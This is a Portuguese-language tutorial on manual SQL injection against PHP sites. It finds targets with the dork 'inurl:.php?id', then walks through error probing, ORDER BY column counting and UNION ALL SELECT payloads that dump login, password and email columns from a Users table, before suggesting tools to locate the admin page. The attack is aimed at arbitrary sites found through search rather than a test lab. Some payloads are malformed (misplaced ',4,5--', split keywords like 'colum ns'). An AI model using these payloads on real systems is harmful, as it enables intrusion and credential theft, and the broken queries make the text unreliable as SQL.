Sqli(Sql Injection) é uma vulnerabilidade que faz com que o invasor possa fazer

1. Sqli(Sql Injection) é uma vulnerabilidade que faz com que o invasor possa fazer a injeção de
2. um código para uma aplicação que tenha o banco de dados Sql.
3.  
4. Para Explorar o Sql injection manualmente deveremos pegar algum site
5. vulnerável a essa injeção!
6.  
7. para pegarmos esse site vulnerável iremos usar o Google hacking,
8. e com uma dork iremos achar sites com algum url parameter
9.  
10. usando a dork "inurl:.php?id" sendo o parametro id, iremos testar para ver
11. se o site contem essa falha.
12.  
13. 1° http://www.example.com.br/noticiaphp?id=143 para checar se tem essa vulnerabilidade vamos colocar um ' depois do id(parametro)
14. ttp://www.example.com.br/noticiaphp?id=143'
15. 2° Existem Vários erros relacionados ao SQLi irei listar alguns aqui em baixo:
16.  
17. "SQL syntax.*MySQL"
18. "Warning.*mysql_.*"
19. "valid MySQL result"
20. "MySqlClient\."
21.  
22. Erro MySQL: You have an error in your SQL syntax;
23. check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
24.  
25. depois de ter checado essa url parameter, vamos usar um comando que irá checar a quantidade de tabelas existentes que seria
26. o *ORDER BY* ou *GROUP BY*
27.  
28. iremos testar tabela por tabela:
29.  
30. http://www.example.com.br/noticia.php?id=143 order by 1-- (NÃO TEM ERRO)
31. http://www.example.com.br/noticia.php?id=143 order by 2-- (NÃO TEM ERRO)
32. http://www.example.com.br/noticia.php?id=143 order by 3-- (NÃO TEM ERRO)
33. http://www.example.com.br/noticia.php?id=143 order by 4-- (NÃO TEM ERRO)
34. http://www.example.com.br/noticia.php?id=143 order by 5-- (NÃO TEM ERRO)
35. http://www.example.com.br/noticia.php?id=143 order by 6-- (CONTÉM ERRO)
36.  
37. Isso Significa que teremos 5 tabelas para explorar...
38. Agora iremos Unir todas essas tabelas usando o comando *UNION ALL SELECT* citando a quantidade de tabelas 1 por 1 e colocando o id com um - no começo:
39.  
40. http://www.example.com.br/noticiaphp?id=-143 union all select 1,2,3,4,5
41.  
42. depois de ter unido todas as tabelas vamos lista-las usando um comando em algumas tabelas,
43. veja um exemplo abaixo:
44.  
45. http://www.example.com.br/noticia.php?id=-143 union all select 1,group_concat(table_name),3 from information_schema.table s where table_schema =database(),4,5--
46.  
47. depois de você ter feito esse comando você irá notar que irá aparecer as tabelas no site
48. suponhamos que seja: Adm, Users, Noticias
49. agora você irá explorar a tabela de seu interesse, eu irei explorar a tabela Users como exemplo para achar agora as colunas
50. e para nós "explorarmos" iremos usar o seguinte comando:
51.  
52. http://www.example.com.br/noticia.php?id=-143 union all select 1,group_concat(column_name),3 from information_schema.colum ns where table_name='Users'4,5--
53.  
54. depois de ter executado esse comando irá aparecer o nome das tabelas que estão na tabela Users, exemplo:
55.  
56. login,senha,email,id
57.  
58. Depois com o nome da tabela na mão e as colunas iremos dar um "dump" nos items da coluna, sendo o comando *CONCAT*, exemplo:
59.  
60. http://www.example.com.br/noticia.php?id=-143 union all select 1,concat(login,0x3a,senha,0x3a,email),3 from Users,4,5--
61.  
62. Entendendo o comando acima:
63. login,senha e email são a coluna
64. Users é a tabela
65. e o 0x3a = ":"
66. concat irá pegar os items das colunas: login,senha,email na Tabela Users
67.  
68. e agora terminando de explorar irá aparecer no site os itens da tabela, exemplo:
69.  
70. admin:admin:admin@gmail.com
71. usercomun:0102:carinha@gmail.com
72.  
73. depois disso usaremos alguns scripts como uniscan, admin page finder para achar sua página administrativa!!
74.  
75.  
76. Isso foi uma pequena explicação de como explorar a falha Sqli Manualmente usando um parameter url